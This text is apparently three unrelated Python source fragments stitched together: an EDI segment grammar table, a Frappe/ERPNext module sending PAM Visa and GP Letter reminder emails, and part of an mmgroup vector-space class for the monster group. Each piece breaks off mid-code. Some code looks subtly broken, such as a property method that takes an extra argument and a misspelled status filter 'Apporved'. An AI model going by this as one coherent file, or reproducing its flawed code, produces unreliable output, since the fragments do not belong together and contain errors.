['BOTSID', 'M', 3,'AN'],
['DN101', 'C', 15,'R'],
['DN102', 'C', 15,'R'],
['DN103', 'C', 1,'AN'],
['DN104', 'C', 80,'AN'],
],
'DN2': [
['BOTSID', 'M', 3,'AN'],
['DN201', 'M', 30,'AN'],
['DN202', 'M', 2,'AN'],
['DN203', 'C', 15,'R'],
],
'DOS': [
['BOTSID', 'M', 3,'AN'],
['DOS01', 'M', (2,2),'AN'],
['DOS02', 'C', 15,'R'],
['DOS03', 'C', 10,'R'],
['DOS04', 'C', 15,'R'],
['DOS05', 'C', 10,'R'],
['DOS06', 'C', (2,2),'AN'],
['DOS07', 'C', 80,'AN'],
],
'DR': [
['BOTSID', 'M', 3,'AN'],
['DR01', 'M', (6,6),'DT'],
['DR02', 'M', (2,4),'AN'],
['DR03', 'M', 7,'AN'],
['DR04', 'M', 11,'AN'],
['DR05', 'C', 4,'R'],
['DR06', 'C', 11,'AN'],
],
'DSB': [
['BOTSID', 'M', 3,'AN'],
['DSB01', 'M', 1,'AN'],
['DSB02', 'C', 15,'R'],
['DSB03', 'C', (4,6),'AN'],
['DSB04', 'C', 1,'AN'],
['DSB05', 'C', 2,'AN'],
['DSB06', 'C', 15,'R'],
['DSB07', 'C', (2,2),'AN'],
['DSB08', 'C', 15,'AN'],
],
'DTM': [
['BOTSID', 'M', 3,'AN'],
['DTM01', 'M', (3,3),'AN'],
['DTM02', 'C', (6,6),'DT'],
['DTM03', 'C', (4,8),'TM'],
['DTM04', 'C', (2,2),'AN'],
['DTM05', 'C', (2,2),'R'],
['DTM06', 'C', (2,3),'AN'],
['DTM07', 'C', 35,'AN'],
],
'DTP': [
['BOTSID', 'M', 3,'AN'],
['DTP01', 'M', (3,3),'AN'],
['DTP02', 'M', (2,3),'AN'],
['DTP03', 'M', 35,'AN'],
],
'DVI': [
['BOTSID', 'M', 3,'AN'],
['DVI01', 'C', (3,3),'AN'],
['DVI02', 'C', 14,'R'],
['DVI03', 'C', (3,3),'AN'],
['DVI04', 'C', (2,3),'AN'],
['DVI05', 'C', 35,'AN'],
['DVI06', 'C', 35,'AN'],
['DVI07', 'C', 15,'R'],
['DVI08', 'C', 30,'AN'],
['DVI09', 'C', (2,2),'AN'],
['DVI10', 'C', (2,3),'AN'],
['DVI11', 'C', 35,'AN'],
['DVI12', 'C', (2,2),'AN'],
['DVI13', 'C', 1,'AN'],
],
'E01': [
['BOTSID', 'M', 3,'AN'],
['E0101', 'M', 1,'AN'],
['E0102', 'M', 1,'AN'],
['E0103', 'M', 12,'AN'],
['E0104', 'M', 1,'AN'],
],
'E03': [
['BOTSID', 'M', 3,'AN'],
['E0301', 'M', 1,'AN'],
['E0302', 'M', 1,'AN'],
['E0303', 'M', (2,3),'AN'],
['E0304', 'M', 1,'AN'],
['E0305', 'M', 1,'AN'],
['E0306', 'M', 7,'R'],
['E0307', 'C', 6,'R'],
],
'E1': [
['BOTSID', 'M', 3,'AN'],
['E101', 'M', (2,30),'AN'],
['E102', 'C', 2,'AN'],
['E103', 'C', (2,17),'AN'],
],
'E10': [
['BOTSID', 'M', 3,'AN'],
['E1001', 'M', 1,'AN'],
['E1002', 'M', (3,3),'AN'],
['E1003', 'M', (2,2),'AN'],
['E1004', 'M', 80,'AN'],
['E1005', 'C', 6,'R'],
],
'E13': [
['BOTSID', 'M', 3,'AN'],
['E1301', 'M', 1,'AN'],
['E1302', 'M', 6,'R'],
['E1303', 'C', 1,'AN'],
['E1304', 'C', (2,3),'AN'],
['E1305', 'C', 1,'AN'],
['E1306', 'C', 7,'R'],
['E1307', 'C', (2,4),'AN'],
['E1308', 'C', 7,'R'],
['E1309', 'C', 1,'R'],
['E1310', 'C', 6,'R'],
],
'E20': [
['BOTSID', 'M', 3,'AN'],
['E2001', 'M', 1,'AN'],
['E2002', 'M', (2,3),'AN'],
['E2003', 'C', 80,'AN'],
['E2004', 'C', 6,'R'],
],
'E22': [
['BOTSID', 'M', 3,'AN'],
['E2201', 'M', 1,'AN'],
['E2202', 'M', 1,'AN'],
['E2203', 'M', 2,'R'],
['E2204', 'C', 2,'R'],
['E2205', 'C', 2,'R'],
['E2206', 'C', 2,'R'],
['E2207', 'C', 2,'R'],
['E2208', 'C', 2,'R'],
['E2209', 'C', 2,'R'],
['E2210', 'C', 2,'R'],
['E2211', 'C', 2,'R'],
['E2212', 'C', 2,'R'],
],
'E24': [
['BOTSID', 'M', 3,'AN'],
['E2401', 'M', 1,'AN'],
['E2402', 'M', 2,'R'],
['E2403', 'M', 4,'R'],
['E2404', 'M', 1,'AN'],
['E2405', 'C', 1,'AN'],
['E2406', 'C', 6,'R'],
],
'E26': [
['BOTSID', 'M', 3,'AN'],
['E2601', 'M', 1,'AN'],
['E2602', 'M', 2,'R'],
['E2603', 'M', 4,'R'],
['E2604', 'M', 1,'AN'],
['E2605', 'C', 1,'AN'],
['E2606', 'C', 6,'R'],
],
'E30': [
['BOTSID', 'M', 3,'AN'],
['E3001', 'M', 1,'AN'],
['E3002', 'M', 4,'R'],
['E3003', 'M', 2,'AN'],
['E3004', 'M', 2,'R'],
['E3005', 'M', 7,'R'],
['E3006', 'C', 80,'AN'],
['E3007', 'C', 6,'R'],
],
'E34': [
['BOTSID', 'M', 3,'AN'],
['E3401', 'M', 1,'AN'],
['E3402', 'M', 8,'AN'],
['E3403', 'C', 80,'AN'],
['E3404', 'M', 80,'AN'],
],
'E4': [
['BOTSID', 'M', 3,'AN'],
['E401', 'M', (2,30),'AN'],
['E402', 'M', (2,2),'AN'],
['E403', 'C', (3,9),'AN'],
['E404', 'C', (2,3),'AN'],
],
'E40': [
['BOTSID', 'M', 3,'AN'],
['E4001', 'M', 1,'AN'],
['E4002', 'M', 6,'R'],
['E4003', 'M', (3,3),'AN'],
['E4004', 'C', 11,'AN'],
],
'E5': [
['BOTSID', 'M', 3,'AN'],
['E501', 'M', (2,4),'AN'],
['E502', 'M', 2,'AN'],
['E503', 'C', (2,30),'AN'],
['E504', 'C', (6,9),'AN'],
],
'E6': [
['BOTSID', 'M', 3,'AN'],
['E601', 'M', 4,'AN'],
['E602', 'M', 10,'AN'],
['E603', 'M', (2,30),'AN'],
['E604', 'C', (6,9),'AN'],
['E605', 'M', (2,4),'AN'],
['E606', 'C', (2,4),'AN'],
['E607', 'C', 16,'AN'],
['E608', 'C', (4,4),'AN'],
['E609', 'M', 2,'AN'],
],
'E7': [
['BOTSID', 'M', 3,'AN'],
['E701', 'C', (2,30),'AN'],
['E702', 'C', (2,2),'AN'],
['E703', 'C', (6,9),'AN'],
['E704', 'C', (2,2),'AN'],
['E705', 'C', (6,6),'DT'],
['E706', 'C', (4,8),'TM'],
],
'E8': [
['BOTSID', 'M', 3,'AN'],
['E801', 'C', 12,'AN'],
['E802', 'C', 2,'AN'],
],
'EA': [
['BOTSID', 'M', 3,'AN'],
['EA01', 'M', (2,3),'AN'],
['EA02', 'C', [
['EA02.01', 'M', (2,2),'AN'],
['EA02.02', 'C', 15,'R'],
['EA02.03', 'C', 10,'R'],
['EA02.04', 'C', (2,2),'AN'],
['EA02.05', 'C', 15,'R'],
['EA02.06', 'C', 10,'R'],
['EA02.07', 'C', (2,2),'AN'],
['EA02.08', 'C', 15,'R'],
['EA02.09', 'C', 10,'R'],
['EA02.10', 'C', (2,2),'AN'],
['EA02.11', 'C', 15,'R'],
['EA02.12', 'C', 10,'R'],
['EA02.13', 'C', (2,2),'AN'],
['EA02.14', 'C', 15,'R'],
['EA02.15', 'C', 10,'R'],
]],
['EA03', 'C', 15,'R'],
],
'EB': [
['BOTSID', 'M', 3,'AN'],
['EB01', 'M', 2,'AN'],
['EB02', 'C', (3,3),'AN'],
['EB03', 'C', 2,'AN'],
['EB04', 'C', 3,'AN'],
['EB05', 'C', 50,'AN'],
['EB06', 'C', 2,'AN'],
['EB07', 'C', 15,'R'],
['EB08', 'C', 10,'R'],
['EB09', 'C', (2,2),'AN'],
['EB10', 'C', 15,'R'],
['EB11', 'C', 1,'AN'],
['EB12', 'C', 1,'AN'],
['EB13', 'C', [
['EB13.01', 'M', (2,2),'AN'],
['EB13.02', 'M', 30,'AN'],
['EB13.03', 'C', (2,2),'AN'],
['EB13.04', 'C', (2,2),'AN'],
['EB13.05', 'C', (2,2),'AN'],
['EB13.06', 'C', (2,2),'AN'],
['EB13.07', 'C', 80,'AN'],
]],
],
'EC': [
['BOTSID', 'M', 3,'AN'],
['EC01', 'C', (2,3),'AN'],
['EC02', 'C', (2,3),'AN'],
['EC03', 'C', (2,3),'AN'],
['EC04', 'C', 10,'R'],
['EC05', 'C', 1,'AN'],
['EC06', 'C', (4,6),'AN'],
],
'ED': [
['BOTSID', 'M', 3,'AN'],
['ED01', 'M', 4,'AN'],
['ED02', 'M', 10,'AN'],
['ED03', 'M', 1,'AN'],
['ED04', 'C', 16,'AN'],
['ED05', 'C', 50,'AN'],
['ED06', 'C', 6,'R'],
['ED07', 'C', (6,6),'DT'],
],
'EFI': [
['BOTSID', 'M', 3,'AN'],
['EFI01', 'M', (2,2),'AN'],
['EFI02', 'C', 264,'AN'],
['EFI03', 'C', (2,2),'AN'],
['EFI04', 'C', 30,'AN'],
['EFI05', 'C', 30,'AN'],
['EFI06', 'C', 30,'AN'],
['EFI07', 'C', 30,'AN'],
['EFI08', 'C', 30,'AN'],
['EFI09', 'C', 30,'AN'],
['EFI10', 'C', (2,2),'AN'],
['EFI11', 'C', 64,'AN'],
['EFI12', 'C', | |
# -*- coding: utf-8 -*-
# encoding: utf-8
from __future__ import unicode_literals
import itertools
from one_fm.api.notification import create_notification_log
from frappe import _
import frappe, os, erpnext, json, math
from frappe.model.document import Document
from frappe.utils import get_site_base_path
from erpnext.hr.doctype.employee.employee import get_holiday_list_for_employee
from frappe.utils.data import flt, nowdate, getdate, cint
from frappe.utils.csvutils import read_csv_content
from frappe.utils import (
cint, cstr, flt, rounded, nowdate, comma_and, date_diff, getdate,
formatdate ,get_url, get_datetime, add_to_date, time_diff, get_time,
time_diff_in_hours
)
from datetime import tzinfo, timedelta, datetime
from dateutil import parser
from datetime import date
from frappe.model.naming import set_name_by_naming_series
from erpnext.hr.doctype.leave_ledger_entry.leave_ledger_entry import (
expire_allocation, create_leave_ledger_entry
)
from dateutil.relativedelta import relativedelta
from frappe.utils import (
cint, cstr, date_diff, flt, formatdate, getdate, get_link_to_form,
comma_or, get_fullname, add_years, add_months, add_days,
nowdate,get_first_day,get_last_day, today
)
import datetime
from datetime import datetime, time
from frappe import utils
import pandas as pd
from erpnext.hr.utils import get_holidays_for_employee
from one_fm.processor import sendemail
from frappe.desk.form import assign_to
from one_fm.one_fm.payroll_utils import get_user_list_by_role
from frappe.core.doctype.user.user import extract_mentions
from frappe.desk.doctype.notification_log.notification_log import get_title, get_title_html
def check_upload_original_visa_submission_reminder2():
pam_visas = frappe.db.sql_list("select name from `tabPAM Visa` where upload_original_visa_submitted=0 and upload_original_visa_reminder2_done=1")
for pam_visa in pam_visas:
pam_visa_doc = frappe.get_doc("PAM Visa", pam_visa)
pam_visa_doc.upload_original_visa_reminder2_done = 0
pam_visa_doc.upload_original_visa_status = 'No Response'
pam_visa_doc.upload_original_visa_reminder2 = frappe.utils.now()
pam_visa_doc.save(ignore_permissions = True)
page_link = "http://192.168.3.11/desk#Form/PAM Visa/" + cstr(pam_visa)
# page_link = get_url("/desk#Form/PAM Visa/" + doc.name)
msg = frappe.render_template('one_fm/templates/emails/pam_visa.html', context={"page_link": page_link, "approval": 'Operator'})
sender = frappe.get_value("Email Account", filters = {"default_outgoing": 1}, fieldname = "email_id") or None
recipient = frappe.db.get_single_value('PAM Visa Setting', 'grd_operator')
sendemail(sender=sender, recipients= recipient,
content=msg, subject="PAM Visa Reminder", delayed=False)
def check_upload_original_visa_submission_reminder1():
pam_visas = frappe.db.sql_list("select name from `tabPAM Visa` where upload_original_visa_submitted=0 and upload_original_visa_reminder2_start=1")
for pam_visa in pam_visas:
pam_visa_doc = frappe.get_doc("PAM Visa", pam_visa)
pam_visa_doc.upload_original_visa_reminder1 = frappe.utils.now()
pam_visa_doc.upload_original_visa_reminder2_start = 0
pam_visa_doc.upload_original_visa_reminder2_done = 1
pam_visa_doc.save(ignore_permissions = True)
page_link = "http://192.168.3.11/desk#Form/PAM Visa/" + cstr(pam_visa)
# page_link = get_url("/desk#Form/PAM Visa/" + doc.name)
msg = frappe.render_template('one_fm/templates/emails/pam_visa.html', context={"page_link": page_link, "approval": 'Operator'})
sender = frappe.get_value("Email Account", filters = {"default_outgoing": 1}, fieldname = "email_id") or None
recipient = frappe.db.get_single_value('PAM Visa Setting', 'grd_operator')
cc = frappe.db.get_single_value('PAM Visa Setting', 'grd_supervisor')
sendemail(sender=sender, recipients= recipient,
content=msg, subject="PAM Visa Reminder", cc=cc, delayed=False)
def check_upload_original_visa_submission_daily():
pam_visas = frappe.db.sql_list("select name from `tabPAM Visa` where upload_original_visa_submitted=0 and upload_original_visa_reminder2_start=0 and upload_original_visa_reminder2_done=0 and upload_original_visa_status!='No Response' and pam_visa_approval_submitted=1")
for pam_visa in pam_visas:
pam_visa_doc = frappe.get_doc("PAM Visa", pam_visa)
pam_visa_doc.upload_original_visa_reminder2_start = 1
pam_visa_doc.save(ignore_permissions = True)
def check_pam_visa_approval_submission_seven():
pam_visas = frappe.db.sql_list("select name from `tabPAM Visa` where pam_visa_approval_submitted=0 and pam_visa_approval_reminder2_done=1")
for pam_visa in pam_visas:
pam_visa_doc = frappe.get_doc("PAM Visa", pam_visa)
pam_visa_doc.pam_visa_approval_reminder2_done = 0
pam_visa_doc.pam_visa_approval_status = 'No Response'
pam_visa_doc.pam_visa_approval_reminder2 = frappe.utils.now()
pam_visa_doc.save(ignore_permissions = True)
page_link = "http://192.168.3.11/desk#Form/PAM Visa/" + cstr(pam_visa)
# page_link = get_url("/desk#Form/PAM Visa/" + doc.name)
msg = frappe.render_template('one_fm/templates/emails/pam_visa.html', context={"page_link": page_link, "approval": 'Operator'})
sender = frappe.get_value("Email Account", filters = {"default_outgoing": 1}, fieldname = "email_id") or None
recipient = frappe.db.get_single_value('PAM Visa Setting', 'grd_operator')
sendemail(sender=sender, recipients= recipient,
content=msg, subject="PAM Visa Reminder", delayed=False)
def check_pam_visa_approval_submission_six_half():
pam_visas = frappe.db.sql_list("select name from `tabPAM Visa` where pam_visa_approval_submitted=0 and pam_visa_approval_reminder2_start=1")
for pam_visa in pam_visas:
pam_visa_doc = frappe.get_doc("PAM Visa", pam_visa)
pam_visa_doc.pam_visa_approval_reminder1 = frappe.utils.now()
pam_visa_doc.pam_visa_approval_reminder2_start = 0
pam_visa_doc.pam_visa_approval_reminder2_done = 1
pam_visa_doc.save(ignore_permissions = True)
page_link = "http://192.168.3.11/desk#Form/PAM Visa/" + cstr(pam_visa)
# page_link = get_url("/desk#Form/PAM Visa/" + doc.name)
msg = frappe.render_template('one_fm/templates/emails/pam_visa.html', context={"page_link": page_link, "approval": 'Operator'})
sender = frappe.get_value("Email Account", filters = {"default_outgoing": 1}, fieldname = "email_id") or None
recipient = frappe.db.get_single_value('PAM Visa Setting', 'grd_operator')
cc = frappe.db.get_single_value('PAM Visa Setting', 'grd_supervisor')
sendemail(sender=sender, recipients= recipient,
content=msg, subject="PAM Visa Reminder", cc=cc, delayed=False)
def check_pam_visa_approval_submission_daily():
pam_visas = frappe.db.sql_list("select name from `tabPAM Visa` where pam_visa_approval_submitted=0 and pam_visa_approval_reminder2_start=0 and pam_visa_approval_reminder2_done=0 and pam_visa_approval_status!='No Response' and status='Apporved'")
for pam_visa in pam_visas:
pam_visa_doc = frappe.get_doc("PAM Visa", pam_visa)
pam_visa_doc.pam_visa_approval_reminder2_start = 1
pam_visa_doc.save(ignore_permissions = True)
def check_upload_tasriah_reminder2():
pam_visas = frappe.db.sql_list("select name from `tabPAM Visa` where upload_tasriah_submitted=0 and upload_tasriah_reminder2_done=1")
for pam_visa in pam_visas:
pam_visa_doc = frappe.get_doc("PAM Visa", pam_visa)
pam_visa_doc.upload_tasriah_reminder2_done = 0
pam_visa_doc.upload_tasriah_status = 'No Response'
pam_visa_doc.upload_tasriah_reminder2 = frappe.utils.now()
pam_visa_doc.save(ignore_permissions = True)
page_link = "http://192.168.3.11/desk#Form/PAM Visa/" + cstr(pam_visa)
# page_link = get_url("/desk#Form/PAM Visa/" + doc.name)
msg = frappe.render_template('one_fm/templates/emails/pam_visa.html', context={"page_link": page_link, "approval": 'Operator'})
sender = frappe.get_value("Email Account", filters = {"default_outgoing": 1}, fieldname = "email_id") or None
recipient = frappe.db.get_single_value('PAM Visa Setting', 'grd_operator')
sendemail(sender=sender, recipients= recipient,
content=msg, subject="PAM Visa Reminder", delayed=False)
def check_upload_tasriah_reminder1():
pam_visas = frappe.db.sql_list("select name from `tabPAM Visa` where upload_tasriah_submitted=0 and upload_tasriah_reminder2_start=1")
for pam_visa in pam_visas:
pam_visa_doc = frappe.get_doc("PAM Visa", pam_visa)
pam_visa_doc.upload_tasriah_reminder1 = frappe.utils.now()
pam_visa_doc.upload_tasriah_reminder2_start = 0
pam_visa_doc.upload_tasriah_reminder2_done = 1
pam_visa_doc.save(ignore_permissions = True)
page_link = "http://192.168.3.11/desk#Form/PAM Visa/" + cstr(pam_visa)
# page_link = get_url("/desk#Form/PAM Visa/" + doc.name)
msg = frappe.render_template('one_fm/templates/emails/pam_visa.html', context={"page_link": page_link, "approval": 'Operator'})
sender = frappe.get_value("Email Account", filters = {"default_outgoing": 1}, fieldname = "email_id") or None
recipient = frappe.db.get_single_value('PAM Visa Setting', 'grd_operator')
cc = frappe.db.get_single_value('PAM Visa Setting', 'grd_supervisor')
sendemail(sender=sender, recipients= recipient,
content=msg, subject="PAM Visa Reminder", cc=cc, delayed=False)
def check_upload_tasriah_submission_nine():
pam_visas = frappe.db.sql_list("select name from `tabPAM Visa` where pam_visa_submitted_supervisor=1 and upload_tasriah_submitted=0 and upload_tasriah_reminder2_start=0 and upload_tasriah_reminder2_done=0 and upload_tasriah_status!='No Response'")
for pam_visa in pam_visas:
pam_visa_doc = frappe.get_doc("PAM Visa", pam_visa)
after_two_days = add_days(pam_visa_doc.pam_visa_reminder_supervisor, 2)
get_defferent = date_diff(frappe.utils.now(), after_two_days)
if get_defferent>=0:
pam_visa_doc.upload_tasriah_reminder2_start = 1
pam_visa_doc.save(ignore_permissions = True)
def check_grp_supervisor_submission_daily():
pam_visas = frappe.db.sql_list("select name from `tabPAM Visa` where pam_visa_submitted=1 and pam_visa_submitted_supervisor=0")
for pam_visa in pam_visas:
pam_visa_doc = frappe.get_doc("PAM Visa", pam_visa)
pam_visa_doc.pam_visa_reminder_supervisor = frappe.utils.now()
pam_visa_doc.save(ignore_permissions = True)
page_link = "http://192.168.3.11/desk#Form/PAM Visa/" + cstr(pam_visa)
# page_link = get_url("/desk#Form/PAM Visa/" + doc.name)
msg = frappe.render_template('one_fm/templates/emails/pam_visa.html', context={"page_link": page_link, "approval": 'Supervisor'})
sender = frappe.get_value("Email Account", filters = {"default_outgoing": 1}, fieldname = "email_id") or None
recipient = frappe.db.get_single_value('PAM Visa Setting', 'grd_supervisor')
sendemail(sender=sender, recipients= recipient,
content=msg, subject="PAM Visa Reminder", delayed=False)
def check_grp_operator_submission_four_half():
pam_visas = frappe.db.sql_list("select name from `tabPAM Visa` where pam_visa_submitted=0 and pam_visa_reminder2_done=1")
for pam_visa in pam_visas:
pam_visa_doc = frappe.get_doc("PAM Visa", pam_visa)
pam_visa_doc.pam_visa_reminder2_done = 0
pam_visa_doc.grd_operator_status = 'No Response'
pam_visa_doc.pam_visa_reminder2 = frappe.utils.now()
pam_visa_doc.save(ignore_permissions = True)
page_link = "http://192.168.3.11/desk#Form/PAM Visa/" + cstr(pam_visa)
# page_link = get_url("/desk#Form/PAM Visa/" + doc.name)
msg = frappe.render_template('one_fm/templates/emails/pam_visa.html', context={"page_link": page_link, "approval": 'Operator'})
sender = frappe.get_value("Email Account", filters = {"default_outgoing": 1}, fieldname = "email_id") or None
recipient = frappe.db.get_single_value('PAM Visa Setting', 'grd_operator')
cc = frappe.db.get_single_value('PAM Visa Setting', 'grd_supervisor')
sendemail(sender=sender, recipients= recipient,
content=msg, subject="PAM Visa Reminder",cc=cc, delayed=False)
def check_grp_operator_submission_four():
pam_visas = frappe.db.sql_list("select name from `tabPAM Visa` where pam_visa_submitted=0 and pam_visa_reminder2_start=1")
for pam_visa in pam_visas:
pam_visa_doc = frappe.get_doc("PAM Visa", pam_visa)
pam_visa_doc.pam_visa_reminder1 = frappe.utils.now()
pam_visa_doc.pam_visa_reminder2_start = 0
pam_visa_doc.pam_visa_reminder2_done = 1
pam_visa_doc.save(ignore_permissions = True)
page_link = "http://192.168.3.11/desk#Form/PAM Visa/" + cstr(pam_visa)
# page_link = get_url("/desk#Form/PAM Visa/" + doc.name)
msg = frappe.render_template('one_fm/templates/emails/pam_visa.html', context={"page_link": page_link, "approval": 'Operator'})
sender = frappe.get_value("Email Account", filters = {"default_outgoing": 1}, fieldname = "email_id") or None
recipient = frappe.db.get_single_value('PAM Visa Setting', 'grd_operator')
sendemail(sender=sender, recipients= recipient,
content=msg, subject="PAM Visa Reminder", delayed=False)
def check_grp_operator_submission_daily():
pam_visas = frappe.db.sql_list("select name from `tabPAM Visa` where pam_visa_submitted=0 and pam_visa_reminder2_start=0 and pam_visa_reminder2_done=0 and grd_operator_status!='No Response'")
for pam_visa in pam_visas:
pam_visa_doc = frappe.get_doc("PAM Visa", pam_visa)
pam_visa_doc.pam_visa_reminder2_start = 1
pam_visa_doc.save(ignore_permissions = True)
def send_gp_letter_attachment_reminder2():
gp_letters_request = frappe.db.sql_list("select DISTINCT gp_letter_request_reference from `tabGP Letter` where (gp_letter_attachment is NULL or gp_letter_attachment='' ) ")
for gp_letter_request in gp_letters_request:
gp_letter_doc = frappe.get_doc("GP Letter Request", gp_letter_request)
if gp_letter_doc.upload_reminder1 and not gp_letter_doc.upload_reminder2:
after_three_days = add_days(gp_letter_doc.upload_reminder1, 3)
get_defferent = date_diff(getdate(nowdate()), after_three_days)
# if get_datetime(frappe.utils.now())>=get_datetime(after_three_days):
if get_defferent>=0:
grd_name = frappe.db.get_single_value('GP Letter Request Setting', 'grd_name')
grd_number = frappe.db.get_single_value('GP Letter Request Setting', 'grd_number')
msg = frappe.render_template('one_fm/templates/emails/gp_letter_attachment_reminder.html', context={"candidates": gp_letter_doc.gp_letter_candidates, "grd_name": grd_name, "grd_number": grd_number})
sender = frappe.get_value("Email Account", filters = {"default_outgoing": 1}, fieldname = "email_id") or None
recipient = frappe.db.get_single_value('GP Letter Request Setting', 'travel_agent_email')
cc = frappe.db.get_single_value('GP Letter Request Setting', 'grd_email')
sendemail(sender=sender, recipients= recipient,
content=msg, subject="GP Letter Upload Reminder" ,cc=cc, delayed=False)
gp_letter_doc.upload_reminder2 = frappe.utils.now()
gp_letter_doc.save(ignore_permissions = True)
def send_gp_letter_attachment_reminder3():
gp_letters_request = frappe.db.sql_list("select DISTINCT gp_letter_request_reference from `tabGP Letter` where (gp_letter_attachment is NULL or gp_letter_attachment='' ) ")
for gp_letter_request in gp_letters_request:
gp_letter_doc = frappe.get_doc("GP Letter Request", gp_letter_request)
if gp_letter_doc.upload_reminder2 and not gp_letter_doc.upload_reminder3:
after_four_hour = add_to_date(gp_letter_doc.upload_reminder2, hours=4)
if get_datetime(frappe.utils.now())>=get_datetime(after_four_hour):
grd_name = frappe.db.get_single_value('GP Letter Request Setting', 'grd_name')
grd_number = frappe.db.get_single_value('GP Letter Request Setting', 'grd_number')
msg = frappe.render_template('one_fm/templates/emails/gp_letter_attachment_reminder.html', context={"candidates": gp_letter_doc.gp_letter_candidates, "grd_name": grd_name, "grd_number": grd_number})
sender = frappe.get_value("Email Account", filters = {"default_outgoing": 1}, fieldname = "email_id") or None
recipient = frappe.db.get_single_value('GP Letter Request Setting', 'travel_agent_email')
cc = frappe.db.get_single_value('GP Letter Request Setting', 'grd_email')
sendemail(sender=sender, recipients= recipient,
content=msg, subject="GP Letter Upload Reminder" ,cc=cc, delayed=False)
gp_letter_doc.upload_reminder3 = frappe.utils.now()
gp_letter_doc.save(ignore_permissions = True)
def send_gp_letter_attachment_no_response():
gp_letters_request = frappe.db.sql_list("select DISTINCT gp_letter_request_reference from `tabGP Letter` where (gp_letter_attachment is NULL or gp_letter_attachment='' ) ")
for gp_letter_request in gp_letters_request:
gp_letter_doc = frappe.get_doc("GP Letter Request", gp_letter_request)
if gp_letter_doc.upload_reminder3 and not gp_letter_doc.upload_reminder4:
gp_letter_doc.upload_reminder4 = frappe.utils.now()
gp_letter_doc.save(ignore_permissions = True)
page_link = "http://192.168.3.11/desk#Form/GP Letter Request/" + gp_letter_request
# page_link = get_url("/desk#Form/GP | |
API reference*.
"""
vector_type = MMVector
space_name = "MV"
check_errors = {
-1: "Bad input value p",
-2: "A one bit outside a field has been found",
-3: "A subfield has an illegal nonzero entry at index >= 24",
-4: "Illegal nonzero diagonal entry",
-5: "Symmetric part of vector is not symmetric",
}
def __init__(self):
"""Create a 196884-dimensional representation of the monster
All calculations are done modulo the odd number p
"""
pass
@property
def mm(self, p):
"""Return module object mmgroup.mm<p> for characteristic p"""
characteristics()
return mm_op[p]
#######################################################################
# Creating vectors
#######################################################################
def zero(self, p):
"""Return the zero vector"""
return MMVector(p, 0)
def copy_vector(self, v1):
assert v1.space == self
v = MMVector(v1.p, 0)
np.copyto(v.data, v1.data)
return v
def set_rand_uniform(self, v1, seed = None):
"""Return a uniform distributed random vector.
``seed`` is a seed for the random generator. The current version
supporst the default seed only. Here some random data taken from
the operating system and from the clock are entered into the seed.
"""
seed = rand_get_seed(seed)
mm_aux_random_mmv(v1.p, v1.data, seed)
return v1
#######################################################################
# Obtaining and setting components via sparse vectors
#######################################################################
def getitems_sparse(self, v1, a_indices):
"""Get items from vector v1
Here we assert that v1 is a vector of this vector space and
that 'a_indices' is a one-dimensional numpy array of type
np.uint32, containing the coordinates to be read from v1.
The function must add the corresponding coordinate to each
entry of the array 'sparse_items'. All coordinates must be
nonnegative and < 256.
A zero entry in the array 'a_indices' is ignored.
"""
if len(a_indices):
mm_aux_mmv_extract_sparse(v1.p, v1.data, a_indices,
len(a_indices))
return a_indices
def additems_sparse(self, v, a_indices):
"""Add a vector in sparse representation to vector v.
This method takes a numpy array 'a_indices' of integers of dtype
numpy.uint32 containing the description of a vector v2 in sparse
representation. It computes
v = v + v2 .
Here vector v is a standard vector in this space.
"""
if len(a_indices):
mm_aux_mmv_add_sparse(v.p, a_indices, len(a_indices),
v.data)
return v
def setitems_sparse(self, v, a_indices):
"""Set selected components of a vector
Arguments 'v' and 'a_indices' are as in method getitems_sparse().
Here the coordinates of vector 'v' described by 'a_indices' are
set to the values given in 'a_indices'.
The array 'a_indices' is not changed.
"""
if len(a_indices):
mm_aux_mmv_set_sparse(v.p, v.data, a_indices,
len(a_indices))
return v
#######################################################################
# Conversion from and to to sparse representation
#######################################################################
def as_sparse(self, v1):
"""Yet to be documented!!
"""
sp = np.zeros(196884, dtype = np.uint32)
length = mm_aux_mmv_to_sparse(v1.p, v1.data, sp)
return sp[:length]
#######################################################################
# Vector operations
#######################################################################
def iadd(self, v1, v2):
if v1.p == v2.p:
v1.ops.op_vector_add(v1.data, v2.data)
return v1
else:
err = "Cannot add vectors modulo differnt numbers"
raise ValueError(err)
def imul_scalar(self, v1, a):
v1.ops.op_scalar_mul(a % v1.p, v1.data)
return v1
#######################################################################
# Group operation
#######################################################################
def imul_group_word(self, v1, g):
"""Return product v1 * g of vector v1 and group word g.
v1 may be destroyed.
This method is called for elements v1 of the space
'self' and for elements g of the group 'self.group' only.
"""
work = mm_vector(v1.p)
if isinstance(g, AbstractMMGroupWord):
a = g.mmdata
v1.ops.op_word(v1.data, a, len(a), 1, work)
return v1
err = "Multiplicator for MM vector must be int or in MM group"
raise TypeError(err)
def vector_mul_exp(self, v1, g, e, break_g = False):
"""Compute product v1 * g**e of vector v1 and group word g.
Here v1 is a vector in this space, e is an integer, g is a
group element, and v1 is replaced by v1 * g**e.
This method should be called for elements v1 of the space
'self' and for elements g of the group 'self.group' only.
If break_g is True, each factor g is multiplied with v1
separately. Otherwise, the expression g**e may be
optimized. This option is mainly for benchmarking.
After applying this function to vecter v1, the vector
v1 has an attribute v1.last_timing containing the run
time of the C part of this operation in seconds.
"""
work = mm_vector(v1.p)
assert v1.space == self
assert -1 << 31 < e < 1 << 31
assert isinstance(g, MM0)
length = g.length
if break_g:
g._extend(length + 1)
g._data[length] = 0x70000000
length += 1
t_start = time.perf_counter()
#t_start = default_timer()
v1.ops.op_word(v1.data, g._data, length, e, work)
v1.last_timing = time.perf_counter() - t_start
#v1.last_timing = default_timer() - t_start
return v1
#######################################################################
# Checking equality
#######################################################################
def equal_vectors(self, v1, v2):
"""Return True iff vectors v1 and v2 are equal
This method is called for elements v1 and v2 of the space
'self' only.
"""
if v1.p == v2.p:
return not v1.ops.op_compare(v1.data, v2.data)
return False
#######################################################################
# Conversion from and to byte format
#######################################################################
def as_bytes(self, v1):
"""Return vector 'self' as a byte array
The result is a numpy array with dtype = uint8 and
shape = (196884,).
"""
b = np.zeros(196884, dtype = np.uint8)
mm_aux_mmv_to_bytes(v1.p, v1.data, b)
return b
def from_bytes(self, p, b):
"""Construct a vector from a byte array
Here ``b`` is an array-like object representing a
one-dimensional array of ``196884`` integers as in the
``numpy`` package. These integers are taken modulo the
characteristic ``p`` of the space.
Array ``b`` represents a vector in this space in linear order
as described method ``tuple_to_index``.
The function returns the vector given by the array ``b`` in
this vector space as an instance of class |MMVector|.
"""
b = np.array(b, dtype = np.int32)
if len(b.shape) != 1:
raise TypeError("Bad shape of byte data vector")
if len(b) != 196884:
